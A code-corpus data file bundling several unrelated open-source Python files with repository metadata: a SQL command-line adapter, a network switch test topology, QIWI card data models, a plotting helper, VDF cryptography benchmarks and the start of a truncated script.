b18ee92e764bf93ddc723331ee49b72f1366542a | 4,403 | py | Python | adapters/adapter.py | ChristfriedBalizou/jeamsql | abd7735831b572f1f1a2d8e47b0759801fd5881c | [
"MIT"
] | null | null | null | adapters/adapter.py | ChristfriedBalizou/jeamsql | abd7735831b572f1f1a2d8e47b0759801fd5881c | [
"MIT"
] | null | null | null | adapters/adapter.py | ChristfriedBalizou/jeamsql | abd7735831b572f1f1a2d8e47b0759801fd5881c | [
"MIT"
] | null | null | null | from tabulate.tabulate import tabulate
import subprocess
import sys
import os
import re
import csv
import io
import json
class Adapter(object):
def __init__(self,
server=None,
port=None,
user=None,
connection_cmd=None,
cmd=None,
test_query=None,
database=None,
error_regex=None,
password=None,
fmt="sql"):
'''
The init function contains the connection parameters
used to initiate the database connection.
'''
self.server = server
self.port = port
self.user = user
self.database = database
self.password = password
self.cmd = cmd
self.test_query = test_query
self.connection_cmd = connection_cmd
self.error_regex = error_regex
self.fmt = fmt
self.__connection__ = None
def connect(self, test=True):
'''
Open a connection to the database.
'''
if not self.__program_exist__():
raise Exception("Command %s is not installed. the connection failed."
% self.cmd)
self.__connection__ = subprocess.Popen(
self.connection_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
if test is True:
try:
self.__connection__.communicate(input=self.test_query)
print 'Connection opened successfully.'
except Exception:
raise
def execute(self, query):
'''
Execute a SQL query command without returning
results.
'''
try:
self.connect(test=False)
except:
pass
def select(self, query=None, fmt=None):
'''
Runs command and "always" return dictionary array
'''
self.connect(test=False)
def close(self):
'''
Close database connection
'''
self.__connection__.communicate(input="quit")
self.__connection__.kill()
print "Connection closed successfuly."
self.__connection__ = None
def tables(self, name=None, fmt=None):
'''
List all tables. If name is given, return only
the requested table, or None if it does not exist.
'''
self.connect(test=False)
def description(self, table_name=None, fmt=None):
'''
List all tables with their descriptions
(table => fields => column : type).
If table_name is given, only the specified
table will be listed.
'''
self.connect(test=False)
def __program_exist__(self):
if self.cmd is None:
return True
try:
for cmd in self.cmd:
with open(os.devnull, 'w') as devnull:
subprocess.call([cmd], stderr=devnull)
return True
except OSError as e:
if e.errno == os.errno.ENOENT:
return False
return True
def __runsql__(self, sql, fmt=None):
pass
def has_error(self, output):
'''
Check if response from sql server came with error
'''
if self.error_regex is not None:
if re.search(self.error_regex, output) is not None:
return True
return False
def to_response(self, output, fmt=None):
'''
Marshall csv to dictionary
'''
if fmt == "csv":
return output.encode("utf-8").replace("\t", ",")
with io.StringIO(output) as infile:
if fmt == "json":
return self.__to_dict__(infile)
if fmt == "sql":
return self.__to_table__(infile)
if fmt is None:
if self.fmt is "json":
return self.__to_dict__(infile)
return self.__to_table__(infile)
def __to_table__(self, infile):
reader = csv.reader(infile, delimiter='\t')
headers = reader.next()
return tabulate(reader, headers, tablefmt="orgtbl")
def __to_dict__(self, infile):
docs = []
for row in csv.DictReader(infile, delimiter='\t'):
doc = {key: value for key, value in row.items()}
docs.append(doc)
return json.dumps(docs, indent=4)
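# Illustrative sketch: a minimal concrete adapter built on the sqlite3
# command-line client. The command name, connection arguments, and error
# pattern below are assumptions for demonstration only; a real subclass
# would also override __runsql__.
class SqliteAdapter(Adapter):
    def __init__(self, database=None):
        super(SqliteAdapter, self).__init__(
            cmd=["sqlite3"],
            connection_cmd=["sqlite3", database],
            test_query="SELECT 1;",
            database=database,
            error_regex=r"Error:",
            fmt="sql")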
| 24.461111 | 81 | 0.539859 | 476 | 4,403 | 4.806723 | 0.302521 | 0.048951 | 0.026224 | 0.034965 | 0.09222 | 0.041958 | 0 | 0 | 0 | 0 | 0 | 0.000723 | 0.371792 | 4,403 | 179 | 82 | 24.597765 | 0.826464 | 0 | 0 | 0.219048 | 0 | 0 | 0.041839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.038095 | 0.07619 | null | null | 0.019048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b192ffd8dc0dbef0c193761ff4f0641070958f09 | 3,384 | py | Python | topologies/dc_t1.py | andriymoroz/sai-challenger | 665f5dbff8c797cfd55cc0c13b03a77aefdb9977 | [
"Apache-2.0"
] | 11 | 2021-04-23T05:54:05.000Z | 2022-03-29T16:37:42.000Z | topologies/dc_t1.py | andriymoroz/sai-challenger | 665f5dbff8c797cfd55cc0c13b03a77aefdb9977 | [
"Apache-2.0"
] | 4 | 2021-06-02T11:05:31.000Z | 2021-11-26T14:39:50.000Z | topologies/dc_t1.py | andriymoroz/sai-challenger | 665f5dbff8c797cfd55cc0c13b03a77aefdb9977 | [
"Apache-2.0"
] | 14 | 2021-02-27T15:17:31.000Z | 2021-11-01T10:15:51.000Z | from contextlib import contextmanager
import pytest
from sai import SaiObjType
@contextmanager
def config(npu):
topo_cfg = {
"lo_rif_oid": None,
"cpu_port_oid": None,
}
# Create Loopback RIF
lo_rif_oid = npu.create(SaiObjType.ROUTER_INTERFACE,
[
"SAI_ROUTER_INTERFACE_ATTR_VIRTUAL_ROUTER_ID", npu.default_vrf_oid,
"SAI_ROUTER_INTERFACE_ATTR_TYPE", "SAI_ROUTER_INTERFACE_TYPE_LOOPBACK",
"SAI_ROUTER_INTERFACE_ATTR_MTU", "9100"
])
topo_cfg["lo_rif_oid"] = lo_rif_oid
# Get CPU port
cpu_port_oid = npu.get(npu.oid, ["SAI_SWITCH_ATTR_CPU_PORT", "oid:0x0"]).oid()
topo_cfg["cpu_port_oid"] = cpu_port_oid
# Get port HW lanes
for oid in npu.port_oids:
port_lanes = npu.get(oid, ["SAI_PORT_ATTR_HW_LANE_LIST", "8:0,0,0,0,0,0,0,0"]).to_list()
# Remove default VLAN members
vlan_mbr_oids = npu.get_list(npu.default_vlan_oid, "SAI_VLAN_ATTR_MEMBER_LIST", "oid:0x0")
for oid in vlan_mbr_oids:
npu.remove(oid)
# Remove default 1Q bridge members
dot1q_mbr_oids = npu.get_list(npu.dot1q_br_oid, "SAI_BRIDGE_ATTR_PORT_LIST", "oid:0x0")
for oid in dot1q_mbr_oids:
bp_type = npu.get(oid, ["SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT"]).value()
if bp_type == "SAI_BRIDGE_PORT_TYPE_PORT":
npu.remove(oid)
npu.dot1q_bp_oids.clear()
# Create default routes
npu.create_route("0.0.0.0/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
npu.create_route("::/0", npu.default_vrf_oid, None,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_DROP"])
# Create Loopback RIF routes
npu.create_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
npu.create_route("fe80::/10", npu.default_vrf_oid, cpu_port_oid,
["SAI_ROUTE_ENTRY_ATTR_PACKET_ACTION", "SAI_PACKET_ACTION_FORWARD"])
yield topo_cfg
# TODO: TEARDOWN
# Remove default routes
npu.remove_route("fe80::/10", npu.default_vrf_oid)
npu.remove_route("fe80::5054:ff:fe12:3456/128", npu.default_vrf_oid)
npu.remove_route("::/0", npu.default_vrf_oid)
npu.remove_route("0.0.0.0/0", npu.default_vrf_oid)
# Create default 1Q bridge members
for oid in npu.port_oids:
bp_oid = npu.create(SaiObjType.BRIDGE_PORT,
[
"SAI_BRIDGE_PORT_ATTR_TYPE", "SAI_BRIDGE_PORT_TYPE_PORT",
"SAI_BRIDGE_PORT_ATTR_PORT_ID", oid,
# "SAI_BRIDGE_PORT_ATTR_BRIDGE_ID", dot1q_br.oid(),
"SAI_BRIDGE_PORT_ATTR_ADMIN_STATE", "true"
])
npu.dot1q_bp_oids.append(bp_oid)
# Create default VLAN members and set PVID
for idx, oid in enumerate(npu.port_oids):
npu.create_vlan_member(npu.default_vlan_oid, npu.dot1q_bp_oids[idx], "SAI_VLAN_TAGGING_MODE_UNTAGGED")
npu.set(oid, ["SAI_PORT_ATTR_PORT_VLAN_ID", npu.default_vlan_id])
# Remove Loopback RIF
npu.remove(lo_rif_oid)
| 40.285714 | 110 | 0.637411 | 477 | 3,384 | 4.100629 | 0.178197 | 0.015337 | 0.018405 | 0.07362 | 0.445808 | 0.367076 | 0.293456 | 0.265337 | 0.244888 | 0.244888 | 0 | 0.031113 | 0.259161 | 3,384 | 83 | 111 | 40.771084 | 0.749103 | 0.100768 | 0 | 0.185185 | 0 | 0 | 0.295575 | 0.251321 | 0 | 0 | 0.002972 | 0.012048 | 0 | 1 | 0.018519 | false | 0 | 0.055556 | 0 | 0.074074 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b193f13f0d572526822d816991b5f3105ef56820 | 7,045 | py | Python | asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py | LexLuthorReal/asynchronous_qiwi | 5847a8d4008493656e973e5283888a4e57234962 | [
"MIT"
] | 3 | 2021-05-20T02:36:30.000Z | 2021-11-28T16:00:15.000Z | asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py | LexLuthorReal/asynchronous_qiwi | 5847a8d4008493656e973e5283888a4e57234962 | [
"MIT"
] | null | null | null | asynchronous_qiwi/models/QIWIWallet/master_m/list_qvc.py | LexLuthorReal/asynchronous_qiwi | 5847a8d4008493656e973e5283888a4e57234962 | [
"MIT"
] | 1 | 2021-11-28T16:00:20.000Z | 2021-11-28T16:00:20.000Z | from loguru import logger
import datetime
from pydantic.fields import ModelField
from typing import Optional, List, Union, Any
from ....utils.tools.str_datetime import convert
from pydantic import BaseModel, Field, validator, ValidationError
from ....data_types.QIWIWallet.list_qvc import ReleasedCardStatus, CardType, CardAlias
class AmountData(BaseModel):
"""Object: \"AmountData\""""
amount: float = Field(..., alias="amount")
currency: str = Field(..., alias="currency")
class Requisites(BaseModel):
name: str = Field(..., alias="name")
value: str = Field(..., alias="value")
class Details(BaseModel):
info: str = Field(..., alias="info")
description: str = Field(..., alias="description")
tariff_link: str = Field(..., alias="tariffLink")
offer_link: str = Field(..., alias="offerLink")
features: List[Any] = Field(..., alias="features")
requisites: List[Union[Requisites]] = Field(..., alias="requisites")
class Info(BaseModel):
id: int = Field(..., alias="id")
name: str = Field(..., alias="name")
alias: Union[str, CardAlias] = Field(..., alias="alias")
price: AmountData = Field(..., alias="price")
period: str = Field(..., alias="period")
type: Union[str, CardAlias] = Field(..., alias="type")
details: Details = Field(..., alias="details")
@validator("alias")
def alias_type(cls, alias: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(alias, str):
try:
alias = CardAlias(alias)
except (KeyError, ValueError) as e:  # enum lookup by value raises ValueError, not KeyError
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return alias
elif isinstance(alias, CardAlias):
return alias
raise ValidationError(model=Info)
@validator("type")
def card_type_type(cls, card_type: Union[str, CardAlias], field: ModelField) -> CardAlias:
if isinstance(card_type, str):
try:
card_type = CardAlias[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardAlias):
return card_type
raise ValidationError(model=Info)
class QVX(BaseModel):
id: int = Field(..., alias="id")
masked_pan: str = Field(..., alias="maskedPan")
status: Optional[Union[str, ReleasedCardStatus]] = Field(..., alias="status")
card_expire: Optional[Union[str, datetime.datetime]] = Field(..., alias="cardExpire")
card_type: Optional[Union[str, CardType]] = Field(..., alias="cardType")
card_alias: str = Field(..., alias="cardAlias")
card_limit: Optional[str] = Field(..., alias="cardLimit")
activated: Optional[Union[str, datetime.datetime]] = Field(..., alias="activated")
sms_resended: Optional[Union[str, datetime.datetime]] = Field(..., alias="smsResended")
post_number: Optional[str] = Field(..., alias="postNumber")
blocked_date: Optional[Union[str, datetime.datetime]] = Field(..., alias="blockedDate")
full_pan: Optional[str] = Field(..., alias="fullPan")
card_id: int = Field(..., alias="cardId")
txn_id: str = Field(..., alias="txnId")
card_expire_month: str = Field(..., alias="cardExpireMonth")
card_expire_year: str = Field(..., alias="cardExpireYear")
@validator('status')
def status_types(cls, status: Union[str, ReleasedCardStatus], field: ModelField) -> ReleasedCardStatus:
if isinstance(status, str):
try:
status = ReleasedCardStatus[status]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return status
elif isinstance(status, ReleasedCardStatus):
return status
raise ValidationError(model=QVX)
@validator('card_expire')
def card_expire_datetime(cls, card_expire: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(card_expire, str):
card_expire = convert(value=card_expire, validator_name=field.name.upper(), alert=False)
return card_expire
elif isinstance(card_expire, datetime.datetime):
return card_expire
elif card_expire is None:
return card_expire
raise ValidationError(model=QVX)
@validator('card_type')
def card_types(cls, card_type: Union[str, CardType], field: ModelField) -> CardType:
if isinstance(card_type, str):
try:
card_type = CardType[card_type]
except KeyError as e:
logger.warning(f"[VALIDATION CONVERT] {field.name.upper()}: " + str(e))
else:
return card_type
elif isinstance(card_type, CardType):
return card_type
raise ValidationError(model=QVX)
@validator('activated')
def activated_datetime(cls, activated: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(activated, str):
activated = convert(value=activated, validator_name=field.name.upper(), alert=False)
return activated
elif isinstance(activated, datetime.datetime):
return activated
elif activated is None:
return activated
raise ValidationError(model=QVX)
@validator('sms_resended')
def sms_resended_datetime(cls, sms_resended: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(sms_resended, str):
sms_resended = convert(value=sms_resended, validator_name=field.name.upper(), alert=False)
return sms_resended
elif isinstance(sms_resended, datetime.datetime):
return sms_resended
elif sms_resended is None:
return sms_resended
raise ValidationError(model=QVX)
@validator('blocked_date')
def blocked_date_datetime(cls, blocked_date: Optional[Union[str, datetime.datetime]],
field: ModelField) -> Optional[datetime.datetime]:
if isinstance(blocked_date, str):
blocked_date = convert(value=blocked_date, validator_name=field.name.upper(), alert=False)
return blocked_date
elif isinstance(blocked_date, datetime.datetime):
return blocked_date
elif blocked_date is None:
return blocked_date
raise ValidationError(model=QVX)
class ListCard(BaseModel):
qvx: QVX = Field(..., alias="qvx")
balance: Optional[AmountData] = Field(..., alias="balance")
info: Info = Field(..., alias="info")
features: List[Any] = Field(..., alias="features")
class ListCardMaster(BaseModel):
data: List[Union[ListCard]] = Field(..., alias="data")
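# Illustrative only: the models above are populated straight from a decoded
# JSON payload. The abbreviated dicts below are fabricated placeholders (not
# real QIWI data) and would need every aliased field filled in to validate:
#
#     cards = ListCardMaster(data=[{"qvx": {...}, "balance": None,
#                                   "info": {...}, "features": []}])
#     print(cards.data[0].qvx.masked_pan)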
| 41.686391 | 107 | 0.628957 | 753 | 7,045 | 5.776892 | 0.14077 | 0.087356 | 0.050805 | 0.044138 | 0.413793 | 0.361839 | 0.297931 | 0.28069 | 0.163678 | 0.163678 | 0 | 0 | 0.239461 | 7,045 | 168 | 108 | 41.934524 | 0.81187 | 0.002839 | 0 | 0.386207 | 0 | 0 | 0.073383 | 0.011969 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055172 | false | 0 | 0.048276 | 0 | 0.551724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
b194d8469a9b5649a06d4a8f9eab020579871edb | 818 | py | Python | src/mciso/visualize.py | lancechua/mciso | 2fd406b7c54f9cb6b331ae8ad3470d1f47696494 | [
"MIT"
] | 2 | 2021-08-06T14:20:37.000Z | 2022-03-29T16:13:10.000Z | src/mciso/visualize.py | lancechua/mciso | 2fd406b7c54f9cb6b331ae8ad3470d1f47696494 | [
"MIT"
] | null | null | null | src/mciso/visualize.py | lancechua/mciso | 2fd406b7c54f9cb6b331ae8ad3470d1f47696494 | [
"MIT"
] | 1 | 2021-08-06T14:21:13.000Z | 2021-08-06T14:21:13.000Z | import matplotlib.pyplot as plt
import pandas as pd
def scenarios_by_product(
X: "np.ndarray", indices: list, products: list, ax: plt.Axes = None
) -> plt.Axes:
"""Plot generated scenarios, with a subplot for each product"""
if ax is None:
_, ax = plt.subplots(X.shape[-1], 1, figsize=(8, X.shape[-1] * 2), sharex=True)
try:
iter(ax)
except TypeError:
ax = [ax]
for i, prod_i in enumerate(products):
pd.DataFrame(
X[:, :, i],
index=indices,
).plot(ax=ax[i], alpha=0.05, linewidth=3, legend=None, color="gray")
pd.DataFrame(X[:, :, i].mean(axis=1), index=indices, columns=["avg"]).plot(
ax=ax[i], alpha=0.8, linewidth=1, legend=None, color="blue"
)
ax[i].set_ylabel(prod_i)
return ax
| 27.266667 | 87 | 0.57335 | 119 | 818 | 3.890756 | 0.529412 | 0.025918 | 0.030238 | 0.056156 | 0.064795 | 0.064795 | 0 | 0 | 0 | 0 | 0 | 0.021631 | 0.265281 | 818 | 29 | 88 | 28.206897 | 0.748752 | 0.069682 | 0 | 0 | 1 | 0 | 0.027815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.095238 | 0 | 0.190476 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b19975a6c0f70cdf1b6594a54b946673ec51a754 | 11,349 | py | Python | benchmarks/benchmarks.py | alanefl/vdf-competition | 84efc3aec180c43582c9421c6fb7fb2e22000635 | [
"Apache-2.0"
] | 97 | 2018-10-04T18:10:42.000Z | 2021-08-23T10:37:06.000Z | benchmarks/benchmarks.py | alanefl/vdf-competition | 84efc3aec180c43582c9421c6fb7fb2e22000635 | [
"Apache-2.0"
] | 4 | 2018-10-04T18:20:49.000Z | 2021-05-03T07:13:14.000Z | benchmarks/benchmarks.py | alanefl/vdf-competition | 84efc3aec180c43582c9421c6fb7fb2e22000635 | [
"Apache-2.0"
] | 17 | 2018-10-08T18:08:21.000Z | 2022-01-12T00:54:32.000Z | import time
import textwrap
import math
import binascii
from inkfish.create_discriminant import create_discriminant
from inkfish.classgroup import ClassGroup
from inkfish.iterate_squarings import iterate_squarings
from inkfish import proof_wesolowski
from inkfish.proof_of_time import (create_proof_of_time_nwesolowski,
check_proof_of_time_nwesolowski,
generate_r_value)
from inkfish import proof_pietrzak
from tests.int_mod_n import int_mod_n
start_t = 0
time_multiplier = 1000 # Use milliseconds
def start_bench():
global start_t
start_t = time.time() * time_multiplier
def end_bench(name, iterations):
global start_t
print("%-80s" % name, round(((time.time() * time_multiplier) - start_t)
/ (iterations), 2), "ms")
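# Usage pattern for the two helpers above: bracket a loop of n identical
# operations, and end_bench prints the mean wall-clock time per iteration
# in milliseconds.
#
#     start_bench()
#     for _ in range(n):
#         do_work()
#     end_bench("description of the operation", n)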
def bench_classgroup():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 512 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 512 bit square", 10000)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 1024 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 1024 bit square", 10000)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
while g[0].bit_length() < g[2].bit_length() or g[1].bit_length() < g[2].bit_length():
g = pow(g, 2)
g2 = pow(g, 2)
start_bench()
for _ in range(0, 10000):
g2 = g2.multiply(g)
end_bench("Classgroup 2048 bit multiply", 10000)
start_bench()
for _ in range(0, 10000):
g2 = g2.square()
end_bench("Classgroup 2048 bit square", 10000)
def bench_discriminant_generation():
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 512)
end_bench("Generate 512 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 1024)
end_bench("Generate 1024 bit discriminant", 100)
start_bench()
for i in range(100):
create_discriminant(i.to_bytes(32, "big"), 2048)
end_bench("Generate 2048 bit discriminant", 100)
def bench_vdf_iterations():
D = create_discriminant(b"seed", 512)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(10):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 512bit classgroup", 10)
D = create_discriminant(b"seed", 1024)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 1024bit classgroup", 2)
D = create_discriminant(b"seed", 2048)
g = ClassGroup.from_ab_discriminant(2, 1, D)
start_bench()
for _ in range(2):
iterate_squarings(g, [10000])
end_bench("VDF 10000 iterations, 2048bit classgroup", 2)
# 2048 bit modulus
prime = int(''.join(textwrap.dedent("""
2634427397878110232503205795695468045251992992603340168049253044454387
1080897872360133472596339100961569230393163880927301060812730934043766
3646941725034559080490451986171041751558689035115943134790395616490035
9846986660803055891526943083539429058955074960014718229954545667371414
8029627597753998530121193913181474174423003742206534823264658175666814
0135440982296559552013264268674093709650866928458407571602481922443634
2306826340229149641664159565679297958087282612514993965471602016939198
7906354607787482381087158402527243744342654041944357821920600344804411
149211019651477131981627171025001255607692340155184929729""").split(
"\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 2048bit RSA modulus", 2)
# 4096 bit modulus
prime = int(''.join(textwrap.dedent("""
8466908771297228398108729385413406312941234872779790501232479567685076
4762372651919166693555570188656362906279057098994287649807661604067499
3053172889374223358861501556862285892231110003666671700028271837785598
2711897721600334848186874197010418494909265899320941516493102418008649
1453168421248338831347183727052419170386543046753155080120058844782449
2367606252473029574371603403502901208633055707823115620627698680602710
8443465519855901353485395338769455628849759950055397510380800451786140
7656499749760023191493764704430968335226478156774628814806959050849093
5035645687560103462845054697907307302184358040130405297282437884344166
7188530230135000709764482573583664708281017375197388209508666190855611
3020636147999796942848529907410787587958203267319164458728792653638371
7065019972034334447374200594285558460255762459285837794285154075321806
4811493971019446075650166775528463987738853022894781860563097254152754
1001763544907553312158598519824602240430350073539728131177239628816329
0179188493240741373702361870220590386302554494325819514615309801491107
2710093592877658471507118356670261129465668437063636041245619411937902
0658733974883998301959084381087966405508661151837877497650143949507846
1522640311670422105209760172585337397687461""").split("\n")))
initial_x = int_mod_n(15619920774592561628351138998371642294622340518469892832433140464182509560910157, prime)
start_bench()
for _ in range(2):
iterate_squarings(initial_x, [10000])
end_bench("VDF 10000 iterations, 4096bit RSA modulus", 2)
def bench_wesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
powers_to_calculate += [iterations]
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_wesolowski.generate_proof(identity, x, y, iterations, k, L, powers)
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 5)
proof_time = round((time.time() * time_multiplier - start_t) / 5)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_wesolowski.verify_proof(x, y, proof, iterations))
end_bench("Wesolowski " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_nwesolowski():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
L, k, _ = proof_wesolowski.approximate_parameters(iterations)
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = [i * k * L for i in range(0, math.ceil(iterations/(k*L)) + 1)]
start_t = time.time() * time_multiplier
for _ in range(20):
iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t) / 20
start_t = time.time() * time_multiplier
start_bench()
for _ in range(20):
result, proof = create_proof_of_time_nwesolowski(discriminant, x, iterations,
discriminant_length, 2, depth=0)
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, proof", 20)
proof_time = round((time.time() * time_multiplier - start_t) / 20)
print(" - Percentage of VDF time:", (((proof_time - vdf_time) / vdf_time) * 100), "%")
start_bench()
for _ in range(20):
assert(check_proof_of_time_nwesolowski(discriminant, x, result + proof, iterations, discriminant_length))
end_bench("n-wesolowski depth 2 " + str(discriminant_length) + "b class group, "
+ str(iterations) + " iterations, verification", 20)
def bench_pietrzak():
iterations = 10000
discriminant_length = 512
discriminant = create_discriminant(b"seed", discriminant_length)
delta = 8
x = ClassGroup.from_ab_discriminant(2, 1, discriminant)
powers_to_calculate = proof_pietrzak.cache_indeces_for_count(iterations)
start_t = time.time() * time_multiplier
powers = iterate_squarings(x, powers_to_calculate)
vdf_time = round(time.time() * time_multiplier - start_t)
y = powers[iterations]
identity = ClassGroup.identity_for_discriminant(discriminant)
start_t = time.time() * time_multiplier
start_bench()
for _ in range(5):
proof = proof_pietrzak.generate_proof(x, iterations, delta, y, powers,
identity, generate_r_value, discriminant_length)
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, proof", 10)
proof_time = round((time.time() * time_multiplier - start_t) / 10)
print(" - Percentage of VDF time:", (proof_time / vdf_time) * 100, "%")
start_bench()
for _ in range(10):
assert(proof_pietrzak.verify_proof(x, y, proof, iterations, delta,
generate_r_value, discriminant_length))
end_bench("Pietrzak " + str(discriminant_length) + "b class group, " + str(iterations)
+ " iterations, verification", 10)
def bench_main():
bench_classgroup()
bench_discriminant_generation()
bench_vdf_iterations()
bench_wesolowski()
bench_nwesolowski()
bench_pietrzak()
if __name__ == '__main__':
bench_main()
"""
Copyright 2018 Chia Network Inc
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
| 38.602041 | 114 | 0.707639 | 1,225 | 11,349 | 6.32898 | 0.160816 | 0.028892 | 0.033535 | 0.03289 | 0.55385 | 0.542113 | 0.517864 | 0.502515 | 0.498904 | 0.466916 | 0 | 0.264093 | 0.201251 | 11,349 | 293 | 115 | 38.733788 | 0.591175 | 0.004406 | 0 | 0.542986 | 0 | 0 | 0.279564 | 0.172398 | 0 | 0 | 0 | 0 | 0.013575 | 1 | 0.040724 | false | 0 | 0.049774 | 0 | 0.090498 | 0.0181 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b19995883a43664eea79cdbbf4ebcc8afcf1f9f2 | 2,415 | py | Python | ccl_dask_blizzard.py | michaelleerilee/CCL-M2BLIZZARD | ff936647d69c5e83553b55d84d7b3a0636290c77 | [
"BSD-3-Clause"
] | null | null | null | ccl_dask_blizzard.py | michaelleerilee/CCL-M2BLIZZARD | ff936647d69c5e83553b55d84d7b3a0636290c77 | [
"BSD-3-Clause"
] | null | null | null | ccl_dask_blizzard.py | michaelleerilee/CCL-M2BLIZZARD | ff936647d69c5e83553b55d84d7b3a0636290c77 | [
"BSD-3-Clause"
] | null | null | null |
import numpy as np
from load_for_ccl_inputs import load_for_ccl_inputs
from ccl_marker_stack import ccl_dask
base = '/home/mrilee/nobackup/tmp/others/'
fnames = None
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz']
if False:
fnames = ['ccl-inputs-globe-122736+23.csv.gz'
,'ccl-inputs-globe-122760+23.csv.gz']
if True:
